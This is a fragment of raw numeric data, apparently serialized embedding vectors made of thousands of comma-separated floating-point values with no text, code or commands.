8,0.017438408,0.016556213,-0.0066078906,0.0072898767,0.00027934,-0.020706018,-0.0032160822,0.005089048,0.0003429104,-0.017598838,-0.010193249,0.019549547,-0.0108191,-0.01352342,-0.008202975,0.0129989125,-0.009476099,0.02188324,0.0031692304,-0.003501498,-0.010828379,0.0138650425,0.02432207,0.036051173,-0.0016457252,-0.066679746,0.0071774204,0.20362149,-0.012963543,0.029431388,0.005042333,-0.021062762,-0.0029807459,-0.08130524,0.000802017,0.018712116,0.008488751,-0.014675311,-0.02447118,0.0035180869,0.018231245,0.0058438606,0.014364193,0.0064846375,-0.014661108,0.00026308585,-0.004862069,0.017402068,-0.017220818,0.007998075,-0.012146887,-0.022679545,0.00022461962,0.016026525,0.0024852175,-0.01149347,0.02011549,-0.013864328,0.005248296,0.006456701,-0.0068702265,-0.03754445,0.011122883,-0.0021301068,-0.0014277202,-0.002386817,-0.017205812,-0.021277726,0.006315248,-0.011319593,-0.021215351,-0.1275331,0.010858905,0.03283946,-0.029033555,0.0039175064,0.0069323904,0.0053546773,0.011843245,0.014345319,-0.031861737,-0.016654015,0.00801183,0.017298067,0.01768096,-0.005169086,0.007442214,-0.025037657,-0.017445963,0.012753963,0.021694124,0.017160114,0.011337547,-0.014723509,-0.018387776,0.0059372927,0.015185985,-0.024054434,-0.007650008,-0.021134894,0.0133777335,-0.021121245,0.022106456,-0.011583558,-0.0115454355,-0.03141065,-0.018676084,-0.0029312326,0.0198826,-0.009947046,-0.0113159865,-0.00025910724,0.003484068,0.002393918,-0.008425627,0.008355925,0.026978852,0.02083564,0.0031047761,0.005610807,0.0110433325,0.048523795,-0.00637755,-0.03184374,-0.010510437,-0.0010190572,-0.007905038,-0.02516798,0.0019749359,0.0033289974,0.0063668587,0.00033180855,-0.007913144,-0.015226977,-0.018650686,-0.00282828,-0.02999048,-0.010137008,-0.029229987,-0.006632377,-0.013960843,-0.00008751172,0.0027026015,0.035285026,-0.0037103475,0.008759116,0.011888557,0.0039077415,0.0021049876,0.017010953,-0.010494378,-0.024281712,-0.0138013465,0.023659227,-0.016707063,-0.009809221,-0.007463704,0.027825382,-0.00076829374,-0.0046217865,-0.009739139,0.002124862,-0.013467302,0.02535053,-0.0053565423,-0.034979276,-0.0054366,0.014048645,0.020345941,-0.0068884175,0.0045134686,-0.0019403991,0.011857531,-0.02418883,0.016982634,-0.0061952225,0.00083736074,0.0036031906,0.001739155,-0.0033872453,0.017724212,-0.020709326,0.009798978,-0.014197858,-0.006228001,-0.019997323,-0.008330689,0.024673337,0.014768678,0.012215899,-0.0010670249,-0.018677216,-0.011451304,-0.020612152,-0.019132258,0.039731525,-0.03423569,-0.022385942,-0.0092060715,0.020322371,-0.03603671,0.012322421,0.039391223,-0.009050016,0.021025859,-0.010968066,0.0133262165,-0.012407393,-0.002836674,-0.005113227,0.008565347,0.021267477,-0.0184968,0.015712589,-0.011150883,0.017803134,0.016402384,0.03253716,0.009801959,0.009912934,-0.004016273,-0.016803322,0.01930942,0.017126456,-0.013478788,-0.014629496,0.10743598,-0.016050488,-0.017101785,0.007929859,-0.02550436,0.020779403,0.020605283,-0.013909456,-0.01965729,0.00056322286,-0.012473591,0.004207063,-0.0036292009,-0.0054680197,-0.0033033523,0.022521077,0.0073154815,-0.0031902594,-0.004063112,0.004440563,0.021358712,-0.013902304,0.0031474032,0.03859877,0.0077298423,-0.03245761,-0.011250253,-0.022023967,-0.013349022,-0.0016001941,-0.012458984,-0.010786786,0.00250105,-0.021201553,-0.0029759812,-0.03858636,-0.0040703835,0.012191708,0.030375423,0.0030028874,0.007448903,0.02188939,0.008823032,-0.019368729,0.012667047,0.00934531,-0.005580994,0.02280553,-0.00049422483,-0.00051163184,-0.010092017,0.005784432,0.015470501,-0.03156516,-0.007988963,-0.025315266,0.017916312,-0.0018142835,-0.005330235,0.005362419,0.05039882,-0.0072244983,0.013818323,-0.013923593,-0.01681575,0.013859474,0.0019761901,0.010004808,0.024160894,0.020507088,-0.004335551,0.007948123,-0.003985094,0.0039389143,-0.013172106,-0.027145179,-0.013987692,0.0009835208,-0.022791289,0.011355603,-0.008171436,0.008771051,0.009660771,0.019550852,-0.01313507,-0.0574962,-0.01473548,-0.014210541,-0.018609844,0.023616899,0.020600954,0.031497627,-0.021553896,0.003966403,0.009676813,-0.009303489,0.0037373635,0.002726941,0.012496862,-0.010325642,0.0141563,0.021924622,-0.01087287,-0.011162294,0.010338272,0.016278049,-0.0058313683,-0.0129789645,0.0052410965,-0.0076019303,0.004869006,0.015628545,0.010260966,-0.0076085273,0.016420877,0.031568836,-0.032190528,-0.012301219,0.0017502774,-0.017286656,-0.013026141,-0.0037248272,-0.0068670292,-0.018396627,-0.016734313,0.0071387086,-0.0025505673,0.030293273,-0.010315216,0.010304742,-0.020040082,0.01507467,-0.025918562,0.0064293314,0.011235214,0.0033311904,0.018862305,0.0049332716,0.016721783,-0.0021738354,-0.007955846,-0.0034958958,-0.00036410312,-0.024821144,-0.006909073,-0.0032123171,0.0020596106,0.012038138,-0.0028934116,0.01059384,-0.00941468,-0.011092956,-0.00829507,-0.0040207165,-0.0017952205,0.0012909271,-0.029390188,0.0076321205,0.016521242,-0.008906896,-0.016766416,0.036214147,0.011757403,-0.003740601,-0.0025285692,0.0063988483,0.013978256,-0.006882278,0.014537569,0.0033906135,-0.0075359875,-0.0049141063,-0.0050594537,0.028241973,-0.010095063,0.009964603,0.024537535,-0.04336321,0.0058762394,0.006000492,0.011810262,0.009994665,-0.023317441,-0.0024746992,0.0147094,-0.012209698,0.022277884,0.021037925,-0.0008857106,0.020043664,0.020191342,0.0037004272,0.017908216,-0.026959794,-0.009183203,-0.0054429895,-0.001810181,-0.013092297,-0.0041212183,0.0025315182,0.014134038,0.018758543,-0.007588692,-0.045278076,0.0040029776,0.003362129,-0.0070179473,-0.00947837,-0.0120327845,-0.0031372856,0.002165139,-0.0026684878,0.010578541,-0.020030355,0.029289372,0.014297634,0.0059811943,-0.0041902005,-0.009568494,-0.012410016,-0.012017002,-0.015532851,0.011963119,-0.008951183,-0.028045379,0.0051494557,-0.013464962,0.093731254,-0.0093922485,0.007306487,-0.0072476473,0.029196413,0.021037826,0.01837232,-0.002391568,0.0030247201,0.006462271,0.006843236,-0.026810631,0.007912525,0.009272838,0.0014158856,-0.03343343,0.020666108,0.005079143,-0.010026552,-0.009806732,-0.016398653,-0.008019639,0.0047576167,-0.0029235214,-0.018573334,-0.030509938,0.0017164605,0.010385545,-0.033185996,-0.0037752623,-0.0057635233,-0.00031656263,-0.008622461,0.0072676754,0.012496852,-0.004349809,0.007955775,0.0010493501,-0.027553882,0.014422636,-0.0036229796,-0.011101446,-0.007700737,-0.014700078,-0.019956533,-0.0035850436,0.0072414423,-0.038495645,-0.005332031,0.017097667,0.0025529205,0.026521403,-0.005343796,-0.0018955127,0.007648254,-0.003099576,-0.012588977,0.00033668376,-0.00288243,0.011804948,-0.0174348,0.0035886553,0.0042455015,-0.013073227,-0.0052966517,0.010149985,0.007799412,-0.01902249,-0.027631031,0.021229353,-0.00020648388,0.03576484,-0.022065014,-0.009592486,0.004287485,0.015645979,0.012293029,-0.007247555,0.019940114,-0.0041385368,-0.029683936,0.0012195674,0.0129673425,0.011802832,-0.008318807,0.017952234,-0.021622678,-0.027785791,0.009122011,-0.008403204,0.0010911045,-0.0083900755,-0.007296029,0.032523856,0.0069995783,-0.0066482886,0.012628517,0.010779904,0.0074083707,-0.028924538,-0.0045129117,-0.019205809,0.02014457,-0.030162456,-0.009378263,0.011040759,-0.08348031,0.0034620664,-0.009740721,-0.015038175,-0.0017264669,-0.011039091,0.018202716,0.07692022,-0.019942475,-0.04775339,-0.01344226,0.017780421,0.010399893,0.02347332,-0.019797958,0.015202826,-0.0069864844,-0.006633074,-0.00338857,0.00074502116,0.0025745677,0.020279258,0.014451452,-0.017118627,0.0006368099,0.009700973,-0.019253695,0.010241552,0.0024351936,0.008791575,-0.005977757,0.0016159734,0.009066871,0.0007313755,-0.03186763,0.01237776,-0.0030014447,0.0019364601,-0.017416725,0.0062684277,-0.016624797,-0.017541237,-0.009426946,0.033399325,0.0019455494,0.0002995504,0.014441873,-0.0013747425,0.030237477,-0.015416811,0.0075171557,-0.011779984,0.036526415,-0.0073240264,0.0033829007,-0.0074903164,-0.031270567,0.003949576,0.014276148,-0.002887145,0.016569914,0.05761772,0.015523797,-0.0068207006,-0.010490068,-0.01731883,-0.019970525,0.0030965274,-0.0033966084,-0.024415663,0.008209085,0.016324017,-0.02163093,0.003533543,-0.0059030787,-0.004673487,0.010639434,0.024290444,-0.011380425,0.013706964,-0.0032394088,-0.001858268,0.0033700564,0.026990492,-0.00847341,0.018343816,-0.010365291,0.014806946,-0.0069902404,-0.006073249,0.007346541,-0.00820666,-0.014804327,-0.009571492,-0.017061397,-0.012453757,0.0066718324,0.030884793,0.016396161,-0.004143433,0.005941241,-0.009444952,-0.01047185,-0.0093128,-0.08905242,0.021897651,-0.016337058,-0.0015967436,-0.0066551645,0.0059307753,-0.020760396,-0.011626264,0.028248733,0.0106382575,0.0057856357,0.029739128,0.02277797,0.0031783406,0.002425822,0.009928364,-0.038177054,0.004138648,-0.012063326,-0.017231785,0.030369075,0.00083141355,-0.010591738,-0.0021251864,-0.0077123106,0.004646773,-0.031371992,0.015064563,0.016461296,-0.0033052948,-0.0011565048,-0.011949778,-0.012691354,0.018847276,0.019305946,-0.025831448,0.0020435168,0.003400551,-0.0066318107,0.010413163,0.020483155,-0.015531657,0.005033388,-0.005446294,0.01188763,0.019833766,0.0042782878,0.019118175,0.033684865,0.0027315288,-0.006101027,0.0154102165,0.0027434335,0.03015471,0.002586882,-0.019992087,-0.024765372,0.0024072768,-0.0006082471,0.010568791,-0.012274509,0.028934011,0.008087671,-0.019912062,-0.013216575,0.00940556,0.005629448,-0.011911801,0.001167842,-0.009480681,0.0006185396,0.017388256,0.01389372,-0.0015998251,0.03055979,-0.0073548034,-0.012444834,0.029083421,0.009433562,-0.014127653,-0.024288595,-0.008455406,-0.02265198,0.022400819,-0.012331511,0.00095144846,-0.0013085252,0.009142188,0.0022850889,0.018862337,0.010534464,0.042018566,-0.0045912983,-0.0033914396,0.01773179,0.028846119,0.01777144,0.0024549295,-0.012887215,0.0034029994,-0.025692532,-0.0024610409,0.0065265214,-0.004768048,-0.0070446315,0.0024706572,-0.012652121,-0.0147477025,0.0050413813,0.020774387,0.030407023,0.02416651,-0.025156803,0.01232109,-0.012822942,-0.01520765,-0.0115414485,-0.0075581623,0.00036969697,0.015455877,-0.013197262,0.01190255,0.009271894,-0.011077363,-0.016648421,0.013616568,-0.02098089,0.02899357,0.015629582,-0.0024718223,-0.010022471,0.012099601,0.0028480017,-0.027607962,-0.006822733,-0.005132225,0.0056167543,-0.012164713,0.029720237,-0.0021598144,0.01169362,0.0010961214,0.021645049,0.0038793946,-0.019962799,-0.026171973,0.01044283,-0.0045643947,0.0052589206,0.003185109,-0.00041589054,-0.020427926,-0.00044515342,-0.001933583,-0.0093907425,0.004325728,-0.012064591,0.013235253,0.008392508,-0.005379063,-0.0038117946,0.013561533,0.021684768,0.0024568157,-0.017999679,0.01842764,0.015093297,0.004718556,0.0035310045,0.0010092962,0.022442648,-0.003712487,-0.015637143,0.01774591,-0.0027748991,0.02945644,0.018030757,0.013615603,-0.0017559166,0.014363795,0.042350702,0.011183976,-0.004929959,0.0010593081,0.012679521,-0.0125292,-0.009412622,-0.0030053959,-0.017902454,-0.0031978816,-0.00033957645,0.009739946,-0.01713753,0.009282371,0.0028316781,-0.007219167,-0.0068351664,0.012346616,0.004074614,-0.031971183,0.0015831131,0.029749071,-0.0061889924,-0.00082887214,0.0001556258,0.008097996,0.005426322,-0.0072091604,0.006786675,0.008339042,-0.001045334,-0.020724185,0.0010825658,0.02005498,0.010891735,0.023480952,-0.020601459,-0.020032678,0.011943151,-0.010626252,-0.0014764316,-0.032119367,0.014307881,-0.023050329,-0.016440244,0.04870106,0.0052595693,0.028247107,0.01541287,-0.0054393196,0.0074730697,0.006072458,0.017169641,0.028216809,-0.008504146,0.022965023,0.007105576,0.01405946,-0.004528738,-0.024543935,-0.0015324408,0.0102737,0.011295692,0.0037041598,-0.007306152,0.009570674,0.012914634,-0.026461432,-0.006401748,-0.0052396143,0.0012048272,0.011694205,-0.010660338,0.0017286498,-0.007813729,-0.032782145,0.0037077873,0.005876028,0.0013175866,0.0070983134,-0.043977175,0.0069268397,0.017365485,0.036389038,0.013706451,0.0051434,0.018966215,-0.018982772,0.003755579,0.0010687058,-0.01691212,0.014035476,0.004891213,0.0022192914,0.027593162,-0.011553365,-0.004259236,-0.0013859237,0.0065548536,-0.009268997,-0.020257622,-0.010854304,-0.010289829,0.00025681712,-0.010700537,0.009829827,-0.021778638,0.020251965,0.0056922035,-0.019419743,-0.013379467,0.013671229,-0.023667194,-0.005391642,-0.008410753,0.0016328875,0.027078632,0.009714087,0.010431248,-0.017040098,-0.0042433366,-0.02331605,-0.013191911,-0.0019846337,-0.038965236,-0.0199885,-0.002307491,0.017392674,-0.011532251,-0.015540024,-0.0033300968,-0.010158029,-0.0035834783,0.002068387,-0.004397254,0.00222124,-0.012468985,-0.007208619,-0.00983982,-0.0028504496,-0.012245193,-0.0075886594,0.031841565,-0.001934162,0.009266485,-0.0028306302,0.028002294,-0.006252349,-0.001576097,0.011318454,0.02689996,0.014784444,-0.024888128,0.00008559835,0.019173276,-0.014495909,0.009953377,0.03030079,0.010494752,0.006484118,0.012121991,0.008749785,0.005780456,-0.0054222,-0.0031594269,-0.008051436,0.012159734,-0.0071703577,0.010995707,0.0021008856,-0.020856174,0.010377326,-0.0047697746,0.0016938678,0.0076985653,-0.00939644,-0.022090007,-0.011863469,0.003872353,0.0056564133,-0.020950712,-0.015350096,0.014579857,-0.021254212,0.0022425766,0.0073496997,-0.011379515,0.0017128157,-0.025486223,0.013405242,-0.012124796,-0.008859025,-0.0087456275,-0.03078567,0.007294462,-0.06675573,-0.00794335,-0.0029858232,-0.002892627,0.0019699824,0.01615834,-0.04014146,0.004496111,-0.0014778068,0.022960864,-0.018472234,-0.015085609,-0.015969958,0.012832298,0.0023437156,-0.021528905,-0.006122193,0.0006087328,0.0080276355,-0.00027105468,0.008228784,0.020876901,0.009707312,0.008317392,-0.003981016,-0.006375803,-0.020786459,-0.0014945462,-0.012175027,0.009014513,0.0049498635,-0.020282429,-0.023350643,0.0013562945,0.00866418,0.010166932,0.0072118193,-0.007935408,0.014539531,-0.010891333,-0.0065538385,0.004860772,0.013961073,-0.010528454,0.011815137,0.03608058,-0.011335796,-0.017800327,-0.031437207,0.010533025,0.0149567025,-0.022538232,-0.0038733378,0.0132232215,0.006065031,0.02681085,-0.018472126,0.024368906,0.036030907,0.0043676486,-0.014876543,-0.009477579,0.017946819,-0.018315418,-0.0042111683,0.009620029,-0.010943449,0.0052275425,-0.020248849,-0.011093833,-0.0024089327,-0.01455581,-0.02678591,0.0019396434,-0.0010202387,0.021429496,-0.010969644,-0.0072478075,0.0061286134,0.015496772,0.025426906,-0.016311629,-0.0048552365,0.0022482495,-0.0112073,-0.009790559,0.017716842,-0.0032179644,0.028197879,0.0073143737,-0.0122755235,-0.006286455,0.0031342022,0.011101941,-0.020269461,0.009281873,-0.021463128,-0.028586429,-0.0149448,0.0074540116,-0.018966395,-0.012868667,0.012354619,0.024222467,0.004217089,-0.003380473,-0.0022061476,0.026601803,-0.0066188853,-0.0027009377,-0.0018478609,0.01022763,0.009887954,0.0001335929,0.024522867,0.005499456,0.0008629894,0.013629145,0.0067601725,0.008089947,-0.016833998,-0.039589204,-0.017904408,0.0019449096,0.00090462185,0.00088301796,0.016395643,-0.015457473,-0.033404022,0.008080297,-0.015534616,0.00863423,0.023520423,0.03617607,0.012488683,-0.001891576,0.02431127,-0.017906766,-0.005211645,-0.0031968534,0.0046301857,-0.018137079,-0.009493247,0.0046251137,-0.006135315,0.059588756,-0.008578938,-0.023910342,0.030794436,0.013790697,0.007882584,-0.0043982198,0.03594316,0.005019304,0.0064641996,0.017670378,0.00796369,-0.0070256703,-0.025676545,-0.007043171,-0.00040184427,0.023547709,-0.012397412,0.004395219,-0.015345305,0.003943714,0.016620994,0.010217325,-0.00426511,-0.023617402,-0.01406931,-0.012602241,-0.02387871,-0.0054684845,-0.0012120369,0.015164722,0.020073371,0.0042835763,-0.010626543,0.008992496,-0.030194249,0.007747325,-0.026036419,-0.00076226715,-0.0020386344,-0.006986209,-0.0028742664,-0.004197493,-0.008795271,-0.007188001,0.0075696907,-0.026179262,-0.0016392277,0.020812437,0.00928399,-0.0039843507,0.00041473718,0.009274828,0.011394672,0.019912815,-0.0066903704,0.018304763,0.015181728,-0.009634501,-0.0043539936,0.014263243,-0.009606532,0.0007321783,0.008630083,0.018878015,0.00049130636,0.0061124275,-0.01775131,0.05034173,0.00918933,-0.007483773,0.0052310266,-0.004448936,0.020056257,0.037995625,0.0040436457,0.0030447943,0.026072195,0.011147042,-0.009264096,-0.0003244805,0.0022113898,-0.01947205,0.02860547,0.012776492,0.00088344666,-0.0071943984,-0.00677034,0.04355075,-0.036908645,0.020036692,0.028815554,0.017122116,-0.04376377,0.0058888895,0.03085409,0.0040306957,0.0050353887,-0.0003679237,0.0009562191,0.018247526,-0.018353911,-0.00025373496,-0.004768818,0.012648233,-0.008818006,-0.008986953,-0.022233892,0.0052842307,0.008639404,-0.0028618611,-0.019290809,-0.024996694,0.018014789,0.012949304,-0.015974566,0.0058826897,0.015519818,0.023813318,0.037285697,-0.0074456157,-0.0016982134,0.0045422097,-0.0031024334,-0.027221188,-0.016318444,0.0088249445,-0.013079383,0.015102063,-0.008102034,-0.002611245,0.029666305,0.0025200993,0.008347932,-0.0151317,0.0031421122,-0.035273988,-0.03734137,0.029522076,-0.015102882,-0.003329666,0.0040962268,-0.0027083468,-0.003701993,-0.018942198,-0.016947713,-0.029561076,-0.013851179,0.00520935,0.023993712,-0.02137338,-0.008165661,-0.0007210005,0.015836874,-0.009915137,0.0060133007,0.0015060069,-0.014653988,0.017827522,-0.0033272507,-0.0065947324,-0.007125089,-0.034474693,0.0005258405,0.03292505,-0.021925867,0.0071789473,0.003047848,0.016968796,-0.006523136,-0.0010039974,-0.014816427,-0.021745624,-0.03472442,-0.013671099,0.014937308,0.01117302,0.0023916233,-0.0045605316,-0.01503994,-0.007456257,0.008948921,-0.00041182357,0.009708656,-0.016829146,-0.028982937,0.009235089,-0.01423859,-0.020507202,-0.010084993,0.028229088,-0.0056637116,-0.004840019,-0.0010582667,-0.0045129186,0.013066732,-0.0019529475,0.0057219667,0.004764518,-0.02846922,-0.030805621,0.003233592,-0.0048157186,0.0067837522,0.01396469,0.008465503,0.014193147,0.027496144,0.009900885,0.01992308,-0.009793779,-0.0164959,0.020687182,-0.0007894731,0.03557302,-0.014162311,0.018452995,0.0054856134,-0.017492048,-0.003123019,0.0054917075,-0.006857979,0.0067338957,-0.033555776,0.026947634,-0.028977694,-0.026150046,-0.00016777565,-0.009797195,0.0008477483,0.0016886578,-0.033498596,0.014657718,-0.00022550358,0.020371426,-0.0016077667,-0.022203974,0.021061309,-0.02943382,0.0041516135,-0.007117385,0.015776383,-0.020230655,-0.016277038,-0.007986148,0.0068570427,-0.0007570544,-0.009010443,0.017105632,0.016206197,-0.007441086,0.035864905,-0.0047312807,-0.013042832,-0.0022366697,0.018942414,-0.00508958,0.040724173,-0.028207796,0.017108982,-0.0020450468,0.003703138,-0.0032132545,0.010010121,-0.017730849,0.051598817,-0.002771804,-0.049339008,-0.0010520128,-0.0061761355,-0.0002008428,-0.012861495,0.010113242,0.012233297,0.0035749013,0.013628997,-0.013124703,-0.00084843504,0.0049870047,-0.0029533808,0.012472655,-0.012853319,0.0017662583,0.0055151638,-0.02461623,-0.0025678722,-0.040811416,-0.0019246021,-0.013238349,-0.0033599627,-0.019390354,-0.0023741394,0.028617244,-0.0052352333,0.006270632,0.022215597,0.017244603,-0.017526982,-0.00029435533,-0.0024434624,-0.012343634,-0.019851834,-0.0063798027,-0.016118528,0.014736392,0.012123,0.0070672664,0.01125642,0.016064733,-0.004650925,-0.019433768,0.00064941647,-0.0096160015,0.0016443655,0.014995162,0.005072093,-0.0022443926,-0.009308572,-0.014981748,0.008337606,-0.04412646,-0.0032727313,-0.02209283,0.000018129982,0.014661534,0.011157444,0.01042147,-0.009579836,-0.00075059175,-0.014415314,0.003903613,0.0075618937,-0.008344735,-0.014361192,0.009713516,-0.011999968,-0.024881171,-0.018432444,-0.030247012,0.008293723,-0.015858939,-0.0114089865,-0.018446175,0.011054466,-0.01739407,0.014310338,-0.015516029,0.0030015907,0.0008333131,-0.01896451,0.011135272,-0.015555141,0.008152446,-0.009393904,0.039727688,0.012405482,0.046141457,-0.04191947,0.015710095,0.015011805,0.01812074,0.012226979,-0.0018677834,-0.013479811,-0.101131804,-0.007647322,0.012998334,-0.01499014,-0.014226548,-0.023151005,0.02102478,0.0070828423,-0.02227265,0.022199035,-0.0019419153,0.0023216184,-0.009699142,0.032946393,0.019676667,-0.0005209222,0.014652334,-0.053271152,0.0040995292,-0.030707436,-0.0006545431,-0.010797562,-0.0025661078,0.00719851,0.0106238015,-0.027634803,0.011605596,0.0054972046,0.00932826,-0.000761275,0.026972866,-0.0058307005,-0.01734693,-0.014677507,0.018381566,0.008654962,0.015711043,-0.0237899,-0.0043267002,-0.004156425,-0.016059428,0.17546289,0.0108328,-0.0082126595,-0.02192168,-0.008949237,-0.014601433,-0.0059458595,0.015724385,-0.016515581,-0.00873967,-0.0010501813,0.012718074,0.0072908183,-0.0046914713,0.025240537,-0.00613657,0.0012785373,0.16985913,0.0044454252,-0.0069858623,-0.008214971,-0.006440346,0.005982957,0.02033191,0.0020224743,-0.07243329,-0.00093103136,-0.033822678,0.016504932,-0.014385745,-0.00049503404,0.039842136,-0.014919916,0.0061030607,0.0056931386,-0.015645783,-0.0011508976,-0.020452296,-0.020909859,0.023981517,-0.027374363,0.0040413393,0.009854092,-0.0022257646,0.0014722656,0.009617097,0.003964131,-0.0077130566,-0.0004614054,0.014919385,-0.0037422194,-0.0004616258,0.035562456,-0.00016637318,0.0022437156,0.022171807,-0.012031952,0.023367884,0.001182141,0.026526606,0.012034875,0.025124852,-0.00189989,0.002588884,-0.030066153,-0.0024164459,-0.00637833,-0.027799128,-0.018549656,0.012089666,-0.0032699772,0.00020091525,-0.0029993334,0.022931665,0.01303241,-0.012174446,-0.01876917,-0.015148227,0.012076998,-0.010064882,0.01878434,0.017002974,-0.0032235223,-0.011297018,0.013360206,0.026852561,-0.006129077,0.010428729,0.014981833,-0.005094599,-0.0057937535,-0.0027056483,-0.0015956337,0.0109653035,-0.017669488,0.016446063,-0.0062513785,0.011833776,-0.026526395,0.026525233,0.001701535,0.018916605,0.00042456147,0.02234858,-0.008792499,0.017395722,0.0075141643,0.014038285,-0.022002153,0.020795416,0.009160126,0.0016726298,0.008823674,0.0066123675,-0.024516445,-0.0067365924,0.0102714645,0.020707596,-0.0033719756,0.011225308,-0.0145928655,0.0021721635,0.021818481,0.00439329,-0.026617166,-0.010198539,-0.008619892,-0.0060944865,-0.019607568,-0.005383181,0.00082986115,-0.0035669566,0.01748585,-0.000109285196,0.026835954,-0.02279351,-0.002947688,-0.030479854,0.007287862,-0.004244685,-0.0042470065,0.03035661,-0.015911736,0.016621744,-0.019443981,-0.0053934352,0.020227624,0.008365052],[0.004957917,0.012508736,0.0016485126,-0.019609064,-0.006766001,-0.0090066595,0.020402968,0.0072795763,0.027810123,-0.01820137,0.009416915,0.0456327,-0.008144027,-0.0034121466,-0.016142495,0.0029341506,0.0039354,0.0067335353,0.018569453,-0.012980473,0.013157268,-0.0068538627,-0.00305332,0.0087270625,0.01715258,0.025603449,-0.013570818,0.006469449,-0.00048161522,-0.007132836,0.01299778,0.026471797,-0.00909653,-0.0078386385,0.020403255,0.0029431777,-0.0055090985,-0.009408036,-0.0034139773,-0.029631153,-0.0019902103,0.01591324,-0.00542146,0.021355078,-0.0015037104,-0.007431304,-0.012060011,0.00053337234,-0.014027869,0.011839527,0.015846906,0.0011732384,-0.010160785,0.017910575,-0.011261891,0.016555073,-0.0005855085,-0.027953185,0.014792885,-0.019273123,-0.004663729,0.007498481,0.0039756824,-0.00722001,0.029142298,-0.0016118143,-0.008448101,-0.018105313,-0.0017108016,-0.0049861623,0.030595414,-0.014510458,0.005935938,-0.008952145,-0.003558215,0.020438286,-0.0012980792,-0.016300121,-0.029199578,-0.016964793,-0.037229292,-0.0007449522,0.025928563,-0.0036626097,0.015536418,0.014921904,-0.014915937,-0.007115257,0.013315963,-0.0026328412,-0.016320398,0.012308024,-0.0032369387,0.0096481005,-0.0043181307,0.01731484,0.0208435,-0.002714788,-0.015530207,0.00039529355,-0.0023258727,-0.024774764,-0.0065002125,0.0121286865,0.01027587,-0.013354985,-0.010693051,0.0064159124,-0.01593082,-0.012406574,-0.0016107074,0.0076460047,-0.0014291536,-0.03135959,-0.004746561,-0.026834434,-0.0012985357,0.013020259,0.000961129,-0.0012533212,0.010161122,0.0049707363,0.017370917,0.01652901,-0.016213242,-0.0094985105,0.01261729,0.005537809,-0.008985577,-0.014291645,-0.010251585,-0.0021480606,-0.007837607,0.0025738305,-0.005749973,0.0054529603,0.009112454,0.004916946,0.0026140022,-0.026872018,0.038033355,0.012436709,0.015167845,0.0060445997,0.018752014,0.030933721,0.0044486714,0.020664446,0.014528256,0.016931966,0.0067362227,-0.009203907,-0.008358855,-0.01671464,0.008407044,0.002225141,-0.018419536,-0.012627222,-0.0069735684,0.012047365,-0.021409042,-0.009628017,-0.010228713,0.015523346,0.0021671636,-0.014852894,-0.016650476,0.008333628,-0.0048690466,0.023628974,0.0065720472,0.02184208,0.012964405,0.00019230583,0.0142206745,0.009855921,0.0135439215,-0.02212893,-0.0008150419,0.019044327,0.0027549348,0.0034148474,-0.0036202113,-0.026300158,0.0038417126,0.031151809,0.01472503,0.028061146,0.009497893,-0.003001594,-0.014173738,-0.011089817,-0.004036556,0.008010516,-0.027471064,-0.013081486,-0.0029353176,0.100474484,-0.007572998,-0.018326541,-0.016598064,-0.02287825,0.016700627,-0.008411483,0.0054181963,-0.0322826,-0.013509643,0.019859117,0.0086989105,-0.022199197,0.009203846,-0.00033755566,0.023601511,0.02461122,0.018005965,-0.0794245,0.022218721,0.030522728,-0.007991996,-0.012813537,0.006936833,0.0012618096,-0.0112336045,-0.018394275,-0.0146421855,-0.005898607,0.01134782,0.0018026554,-0.004847494,-0.021491585,0.02029761,0.018422013,-0.02927466,-0.009549533,-0.014826497,-0.0061495965,0.0049023465,-0.019021172,0.004459155,-0.02616536,0.0035425117,-0.0093456125,0.0031893097,0.0063735563,-0.004009228,-0.015659751,0.006477501,0.0028102794,0.002556428,-0.0005098291,0.0019958394,-0.023896828,0.006332001,0.015388892,0.010616049,-0.020475948,0.01301795,0.00046495345,0.005599223,0.028192062,0.01275992,0.03199243,-0.005404303,0.02839305,0.028802847,0.004473399,-0.0007040628,-0.03684092,-0.0014979535,-0.01706937,-0.036151633,0.018730199,0.01016772,-0.032716986,0.010173803,-0.0002472414,0.012532277,0.004965721,-0.006246058,0.0012438624,-0.00598938,-0.0010271984,-0.025523826,-0.00832409,-0.035360847,-0.00743275,0.022247598,0.006335969,0.009714491,0.015256164,-0.024706038,0.0010764877,0.027024867,0.0022934263,-0.007456196,0.004505222,-0.022247542,0.03499354,0.02030926,-0.017811006,-0.0038989848,-0.014388484,0.030369455,-0.0082120905,0.0007262262,-0.026639452,0.015029162,0.011699093,-0.009184254,0.012153708,-0.029353213,-0.007980427,0.0039970353,-0.0068569137,0.01602789,0.012012528,0.007399854,-0.0092210695,-0.0029269601,0.01301357,0.017989697,-0.0041568624,-0.0016044057,-0.014821914,-0.007859986,-0.014661549,0.0022691607,-0.0047492115,0.014038824,0.019127814,0.001986813,0.0059766453,0.0034913458,0.010674609,-0.030836616,0.004616186,-0.0039117183,0.016932568,-0.0066380096,0.022205079,0.008670457,-0.004568922,-0.016952816,-0.003423827,-0.0026299376,0.008292047,0.0036446338,-0.013280026,0.020580685,0.0071792165,-0.010792791,0.012163199,-0.02725564,-0.013344696,0.0071701426,0.009703995,-0.008831953,0.004508828,-0.014200718,0.0011163608,0.033407282,-0.01125652,-0.0018017954,-0.0018065087,0.060555484,0.00038492508,-0.015474151,-0.012635803,-0.03184862,-0.011753922,0.028590128,0.01967624,-0.0040733772,-0.0153630925,0.0015653758,-0.014597688,0.001555878,0.024254082,-0.006661276,-0.0125295,-0.019626833,-0.011156675,-0.010852684,-0.01733512,0.009285732,-0.0018042688,-0.014445585,0.024139928,0.012135708,0.005807595,-0.011157183,0.008938766,-0.023543615,-0.023360297,-0.0019924124,-0.012197435,-0.0047524404,-0.007200384,-0.038212914,0.039873533,-0.00041585846,-0.007334176,-0.019015787,0.0054647597,-0.0077724643,-0.010032732,-0.00091333257,-0.01873453,-0.0046825754,0.021512548,0.015337834,0.02056655,0.005522223,0.012321503,-0.003512738,0.008263748,-0.023543354,0.032155607,0.00259882,0.023028657,0.004258028,-0.019535253,0.027143018,0.024594685,0.014153187,0.01642374,-0.03470787,0.004707461,0.0008340127,0.037786156,0.009401732,-0.016795598,-0.0029133921,-0.0080296835,-0.009308626,0.011464799,-0.01407913,0.0040779044,0.0040576803,0.0018662128,-0.009224898,-0.014280291,-0.0057351375,0.004916202,0.007634366,-0.0011672331,-0.0075093885,0.011103679,-0.03285194,0.004829513,0.020745367,0.008465293,0.0014530931,0.010461389,0.023811523,0.008757805,0.014830789,-0.0015560696,0.01307682,0.009996327,0.018450081,-0.0061372505,-0.009054028,0.011429824,-0.011271834,0.020867705,0.016414331,-0.011856061,-0.004605118,-0.008939979,0.009043383,-0.021484172,0.0033769032,